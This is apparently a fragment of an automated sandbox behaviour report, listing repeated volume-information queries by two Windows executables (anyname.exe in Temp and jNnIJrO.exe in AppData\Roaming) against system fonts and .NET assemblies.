                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Users\user\AppData\Local\Temp\anyname.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
